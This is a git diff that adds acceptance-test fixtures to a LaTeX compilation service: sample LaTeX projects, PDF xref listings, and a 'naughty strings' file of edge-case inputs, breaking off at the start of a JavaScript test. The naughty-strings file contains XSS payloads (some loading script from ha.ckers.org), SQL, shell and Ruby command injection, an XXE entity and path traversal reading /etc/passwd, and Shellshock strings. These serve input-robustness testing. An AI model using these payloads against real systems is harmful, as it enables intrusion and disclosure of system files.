diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf new file mode 100644 index 0000000..7ab1341 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref new file mode 100644 index 0000000..60f7510 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 48194 +2/0: uncompressed; offset = 48442 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 699 +6/0: uncompressed; offset = 749 +7/0: uncompressed; offset = 878 +8/0: uncompressed; offset = 1000 +9/0: uncompressed; offset = 8546 +10/0: uncompressed; offset = 9072 +11/0: uncompressed; offset = 10659 +12/0: uncompressed; offset = 18919 +13/0: uncompressed; offset = 35129 +14/0: uncompressed; offset = 47101 +15/0: compressed; stream = 14, index = 0 +16/0: compressed; stream = 14, index = 1 +17/0: compressed; stream = 14, index = 2 +18/0: compressed; stream = 14, index = 3 +19/0: compressed; stream = 14, index = 4 +20/0: compressed; stream = 14, index = 5 +21/0: compressed; stream = 14, index = 6 +22/0: compressed; stream = 14, index = 7 +23/0: compressed; stream = 14, index = 8 +24/0: compressed; stream = 14, index = 9 +25/0: compressed; stream = 14, index = 10 +26/0: compressed; stream = 14, index = 11 diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib new file mode 100644 index 0000000..5654dbd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib @@ -0,0 +1,10 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + + diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex new file mode 100644 index 0000000..3056c07 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex @@ -0,0 +1 @@ +This is chapter1.tex, included from main.tex diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png new file mode 100644 index 0000000..8660218 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png differ diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex new file mode 100644 index 0000000..9972cde --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex @@ -0,0 +1,19 @@ +\documentclass{article} + +\usepackage{graphicx} + +\begin{document} + +Hello world, I'm in a subdirectory \cite{DouglasAdams} + +\input{chapter1.tex} +\input{chapter2.tex} + +\begin{centering} 
+\includegraphics[width=0.5\textwidth]{image.png} +\end{centering} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex new file mode 100644 index 0000000..6071bc2 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex @@ -0,0 +1,66 @@ +\RequirePackage{luatex85} +\documentclass[tikz]{standalone} + +\usepackage[compat=1.1.0]{tikz-feynman} + +\begin{document} +\feynmandiagram [horizontal=a to b] { + i1 -- [fermion] a -- [fermion] i2, + a -- [photon] b, + f1 -- [fermion] b -- [fermion] f2, +}; + +\feynmandiagram [horizontal=a to b] { + i1 [particle=\(e^{-}\)] -- [fermion] a -- [fermion] i2 [particle=\(e^{+}\)], + a -- [photon, edge label=\(\gamma\), momentum'=\(k\)] b, + f1 [particle=\(\mu^{+}\)] -- [fermion] b -- [fermion] f2 [particle=\(\mu^{-}\)], +}; + +\feynmandiagram [large, vertical=e to f] { + a -- [fermion] b -- [photon, momentum=\(k\)] c -- [fermion] d, + b -- [fermion, momentum'=\(p_{1}\)] e -- [fermion, momentum'=\(p_{2}\)] c, + e -- [gluon] f, + h -- [fermion] f -- [fermion] i, +}; + +\begin{tikzpicture} + \begin{feynman} + \vertex (a1) {\(\overline b\)}; + \vertex[right=1cm of a1] (a2); + \vertex[right=1cm of a2] (a3); + \vertex[right=1cm of a3] (a4) {\(b\)}; + \vertex[right=1cm of a4] (a5); + \vertex[right=2cm of a5] (a6) {\(u\)}; + + \vertex[below=2em of a1] (b1) {\(d\)}; + \vertex[right=1cm of b1] (b2); + \vertex[right=1cm of b2] (b3); + \vertex[right=1cm of b3] (b4) {\(\overline d\)}; + \vertex[below=2em of a6] (b5) {\(\overline d\)}; + + \vertex[above=of a6] (c1) {\(\overline u\)}; + \vertex[above=2em of c1] (c3) {\(d\)}; + \vertex at ($(c1)!0.5!(c3) - (1cm, 0)$) (c2); + + \diagram* { + {[edges=fermion] + (b1) -- (b2) -- (a2) -- (a1), + (b5) -- (b4) -- (b3) -- (a3) -- (a4) -- (a5) -- (a6), + }, + (a2) -- [boson, edge label=\(W\)] (a3), + (b2) -- [boson, edge label'=\(W\)] (b3), + + (c1) -- [fermion, out=180, in=-45] (c2) -- [fermion, out=45, in=180] (c3), + (a5) -- [boson, bend left, edge label=\(W^{-}\)] (c2), + }; + + \draw [decoration={brace}, decorate] (b1.south west) -- (a1.north west) + node [pos=0.5, left] {\(B^{0}\)}; + \draw [decoration={brace}, decorate] (c3.north east) -- (c1.south east) + node [pos=0.5, right] {\(\pi^{-}\)}; + \draw [decoration={brace}, decorate] (a6.north east) -- (b5.south east) + node [pos=0.5, right] {\(\pi^{+}\)}; + \end{feynman} +\end{tikzpicture} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json new file mode 100644 index 0000000..96a0543 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "lualatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf new file mode 100644 index 0000000..f14b865 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref new file mode 100644 index 0000000..64f5dc2 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref @@ -0,0 +1,35 @@ 
+1/0: uncompressed; offset = 2924 +2/0: uncompressed; offset = 3039 +3/0: uncompressed; offset = 4606 +4/0: uncompressed; offset = 4721 +5/0: uncompressed; offset = 7754 +6/0: uncompressed; offset = 7870 +7/0: uncompressed; offset = 11668 +8/0: uncompressed; offset = 21077 +9/0: uncompressed; offset = 28498 +10/0: uncompressed; offset = 35464 +11/0: uncompressed; offset = 35699 +12/0: uncompressed; offset = 15 +13/0: uncompressed; offset = 216 +14/0: uncompressed; offset = 703 +15/0: uncompressed; offset = 754 +16/0: uncompressed; offset = 909 +17/0: uncompressed; offset = 1026 +18/0: uncompressed; offset = 2161 +19/0: compressed; stream = 18, index = 0 +20/0: compressed; stream = 18, index = 1 +21/0: compressed; stream = 18, index = 2 +22/0: compressed; stream = 18, index = 3 +23/0: compressed; stream = 18, index = 4 +24/0: compressed; stream = 18, index = 5 +25/0: compressed; stream = 18, index = 6 +26/0: compressed; stream = 18, index = 7 +27/0: compressed; stream = 18, index = 8 +28/0: compressed; stream = 18, index = 9 +29/0: compressed; stream = 18, index = 10 +30/0: compressed; stream = 18, index = 11 +31/0: compressed; stream = 18, index = 12 +32/0: compressed; stream = 18, index = 13 +33/0: compressed; stream = 18, index = 14 +34/0: compressed; stream = 18, index = 15 +35/0: compressed; stream = 18, index = 16 diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf new file mode 100644 index 0000000..b683280 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/Zapfino.ttf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex new file mode 100644 index 0000000..ad9438a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/main.tex @@ -0,0 +1,7 @@ +\documentclass[11pt]{article} +\usepackage{fontspec} +\setmainfont[Ligatures=TeX]{Zapfino.ttf} +\begin{document} +The quick brown fox jumps over the lazy dog +\end{document} + diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json new file mode 100644 index 0000000..a2e0c09 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "xelatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf new file mode 100644 index 0000000..846b388 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref new file mode 100644 index 0000000..20aa4ba --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/xelatex_compiler/output.pdfxref @@ -0,0 +1,19 @@ +1/0: uncompressed; offset = 8578 +2/0: uncompressed; offset = 15 +3/0: uncompressed; offset = 216 +4/0: uncompressed; offset = 658 +5/0: uncompressed; offset = 708 +6/0: uncompressed; offset = 837 +7/0: uncompressed; offset = 940 +8/0: uncompressed; offset = 1191 +9/0: uncompressed; offset = 1627 +10/0: uncompressed; offset = 7676 +11/0: uncompressed; offset = 7784 +12/0: 
uncompressed; offset = 7822 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 diff --git a/services/clsi/test/acceptance/fixtures/lion.png b/services/clsi/test/acceptance/fixtures/lion.png new file mode 100644 index 0000000..64eb549 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/lion.png differ diff --git a/services/clsi/test/acceptance/fixtures/minimal.pdf b/services/clsi/test/acceptance/fixtures/minimal.pdf new file mode 100644 index 0000000..d578e90 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/minimal.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/minimal.pdfxref b/services/clsi/test/acceptance/fixtures/minimal.pdfxref new file mode 100644 index 0000000..38b6e8f --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/minimal.pdfxref @@ -0,0 +1,15 @@ +1/0: uncompressed; offset = 11784 +2/0: uncompressed; offset = 12033 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 621 +6/0: uncompressed; offset = 671 +7/0: uncompressed; offset = 791 +8/0: uncompressed; offset = 906 +9/0: uncompressed; offset = 1070 +10/0: uncompressed; offset = 11235 +11/0: compressed; stream = 10, index = 0 +12/0: compressed; stream = 10, index = 1 +13/0: compressed; stream = 10, index = 2 +14/0: compressed; stream = 10, index = 3 +15/0: compressed; stream = 10, index = 4 diff --git a/services/clsi/test/acceptance/fixtures/naugty_strings.txt b/services/clsi/test/acceptance/fixtures/naugty_strings.txt new file mode 100644 index 0000000..92eb1dd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/naugty_strings.txt @@ -0,0 +1,626 @@ +\documentclass{article} +\usepackage[utf8]{inputenc} + +\title{eee} +\author{henry.oswald } +\date{September 2015} + +\usepackage{natbib} +\usepackage{graphicx} + +\begin{document} + +\maketitle + +\section{Introduction} + +Encoding: utf8 + +# Reserved Strings +# +# Strings which may be used elsewhere in code + +undefined +undef +null +NULL +(null) +nil +NIL +true +false +True +False +None +\ +\\ + +# Numeric Strings +# +# Strings which can be interpreted as numeric + +0 +1 +1.00 +$1.00 +1/2 +1E2 +1E02 +1E+02 +-1 +-1.00 +-$1.00 +-1/2 +-1E2 +-1E02 +-1E+02 +1/0 +0/0 +-2147483648/-1 +-9223372036854775808/-1 +0.00 +0..0 +. +0.0.0 +0,00 +0,,0 +, +0,0,0 +0.0/0 +1.0/0.0 +0.0/0.0 +1,0/0,0 +0,0/0,0 +--1 +- +-. +-, +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +NaN +Infinity +-Infinity +0x0 +0xffffffff +0xffffffffffffffff +0xabad1dea +123456789012345678901234567890123456789 +1,000.00 +1 000.00 +1'000.00 +1,000,000.00 +1 000 000.00 +1'000'000.00 +1.000,00 +1 000,00 +1'000,00 +1.000.000,00 +1 000 000,00 +1'000'000,00 +01000 +08 +09 +2.2250738585072011e-308 + +# Special Characters +# +# Strings which contain common special ASCII characters (may need to be escaped) + +,./;'[]\-= +<>?:"{}|_+ +!@#$%^&*()`~ + +# Unicode Symbols +# +# Strings which contain common unicode symbols (e.g. 
smart quotes) + +Ω≈ç√∫˜µ≤≥÷ +åß∂ƒ©˙∆˚¬…æ +œ∑´®†¥¨ˆøπ“‘ +¡™£¢∞§¶•ªº–≠ +¸˛Ç◊ı˜Â¯˘¿ +ÅÍÎÏ˝ÓÔÒÚÆ☃ +Œ„´‰ˇÁ¨ˆØ∏”’ +`⁄€‹›fifl‡°·‚—± +⅛⅜⅝⅞ +ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя +٠١٢٣٤٥٦٧٨٩ + +# Unicode Subscript/Superscript +# +# Strings which contain unicode subscripts/superscripts; can cause rendering issues + +⁰⁴⁵ +₀₁₂ +⁰⁴⁵₀₁₂ + +# Quotation Marks +# +# Strings which contain misplaced quotation marks; can cause encoding errors + +' +" +'' +"" +'"' +"''''"'" +"'"'"''''" + +# Two-Byte Characters +# +# Strings which contain two-byte characters: can cause rendering issues or character-length issues + +田中さんにあげて下さい +パーティーへ行かないか +和製漢語 +部落格 +사회과학원 어학연구소 +찦차를 타고 온 펲시맨과 쑛다리 똠방각하 +社會科學院語學研究所 +울란바토르 +𠜎𠜱𠝹𠱓𠱸𠲖𠳏 + +# Japanese Emoticons +# +# Strings which consists of Japanese-style emoticons which are popular on the web + +ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ +(。◕ ∀ ◕。) +`ィ(´∀`∩ +__ロ(,_,*) +・( ̄∀ ̄)・:*: +゚・✿ヾ╲(。◕‿◕。)╱✿・゚ +,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ +(╯°□°)╯︵ ┻━┻) +(ノಥ益ಥ)ノ ┻━┻ +( ͡° ͜ʖ ͡°) + +# Emoji +# +# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + +😍 +👩🏽 +👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 +🐵 🙈 🙉 🙊 +❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 +✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 +🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 +0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 + +# Unicode Numbers +# +# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +123 +١٢٣ + +# Right-To-Left Strings +# +# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. +בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ +הָיְתָהtestالصفحات التّحول +﷽ +ﷺ + +# Unicode Spaces +# +# Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html) + +​ +  +᠎ +  + +␣ +␢ +␡ + +# Trick Unicode +# +# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +‪‪test‪ +‫test‫ +
test
 +test⁠test‫ +⁦test⁧ + +# Zalgo Text +# +# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ +̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ +̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ +̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ +Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ + +# Unicode Upsidedown +# +# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) + +˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ +00˙Ɩ$- + +# Unicode font +# +# Strings which contain bold/italic/etc. versions of normal characters + +The quick brown fox jumps over the lazy dog +𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 +𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 +𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 +𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 +𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 +𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 +⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ + +# Script Injection +# +# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + +<script>alert('123');</script> + + +"> +'> +> + +< / script >< script >alert(123)< / script > + onfocus=JaVaSCript:alert(123) autofocus +" onfocus=JaVaSCript:alert(123) autofocus +' onfocus=JaVaSCript:alert(123) autofocus +<script>alert(123)</script> +ript>alert(123)ript> +--> +";alert(123);t=" +';alert(123);t=' +JavaSCript:alert(123) +;alert(123); +src=JaVaSCript:prompt(132) +">javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +ABC
    DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +<plaintext> + +# SQL Injection +# +# Strings which can cause a SQL injection if inputs are not sanitized + +1;DROP TABLE users +1'; DROP TABLE users-- 1 +' OR 1=1 -- 1 +' OR '1'='1 + +# Server Code Injection +# +# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +- +-- +--version +--help +$USER +/dev/null; touch /tmp/blns.fail ; echo +`touch /tmp/blns.fail` +$(touch /tmp/blns.fail) +@{[system "touch /tmp/blns.fail"]} + +# Command Injection (Ruby) +# +# Strings which can call system commands within Ruby/Rails applications + +eval("puts 'hello world'") +System("ls -al /") +`ls -al /` +Kernel.exec("ls -al /") +Kernel.exit(1) +%x('ls -al /') + +# XXE Injection (XML) +# +# String which can reveal system files when parsed by a badly configured XML parser + +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> + +# Unwanted Interpolation +# +# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. 
+ +$HOME +$ENV{'HOME'} +%d +%s +%*.*s + +# File Inclusion +# +# Strings which can cause user to pull in files that should not be a part of a web server + +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/hosts + +# Known CVEs and Vulnerabilities +# +# Strings that test for known vulnerabilities + +() { 0; }; touch /tmp/blns.shellshock1.fail; +() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } + +# MSDOS/Windows Special Filenames +# +# Strings which are reserved characters in MSDOS/Windows + +CON +PRN +AUX +CLOCK$ +NUL +A: +ZZ: +COM1 +LPT1 +LPT2 +LPT3 +COM2 +COM3 +COM4 + +# Scunthorpe Problem +# +# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +Scunthorpe General Hospital +Penistone Community Church +Lightwater Country Park +Jimmy Clitheroe +Horniman Museum +shitake mushrooms +RomansInSussex.co.uk +http://www.cum.qc.ca/ +Craig Cockburn, Software Specialist +Linda Callahan +Dr. Herman I. Libshitz +magna cum laude +Super Bowl XXX +medieval erection of parapets +evaluate +mocha +expression +Arsenal canal +classic +Tyson Gay + +# Human injection +# +# Strings which may cause human to reinterpret worldview + +If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. + +# Terminal escape codes +# +# Strings which punish the fools who use cat/type on this file + +Roses are red, violets are blue. Hope you enjoy terminal hue +But now...for my greatest trick... +The quick brown fox... [Beeeep] + +# iOS Vulnerability +# +# Strings which crashed iMessage in iOS versions 8.3 and earlier + +Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 + + +\end{document} diff --git a/services/clsi/test/acceptance/js/AllowedImageNamesTests.js b/services/clsi/test/acceptance/js/AllowedImageNamesTests.js new file mode 100644 index 0000000..897f5d9 --- /dev/null +++ b/services/clsi/test/acceptance/js/AllowedImageNamesTests.js @@ -0,0 +1,187 @@ +const Client = require('./helpers/Client') +const ClsiApp = require('./helpers/ClsiApp') +const { expect } = require('chai') + +describe('AllowedImageNames', function () { + beforeEach(function (done) { + this.project_id = Client.randomId() + this.request = { + options: { + imageName: undefined, + }, + resources: [ + { + path: 'main.tex', + content: `\ 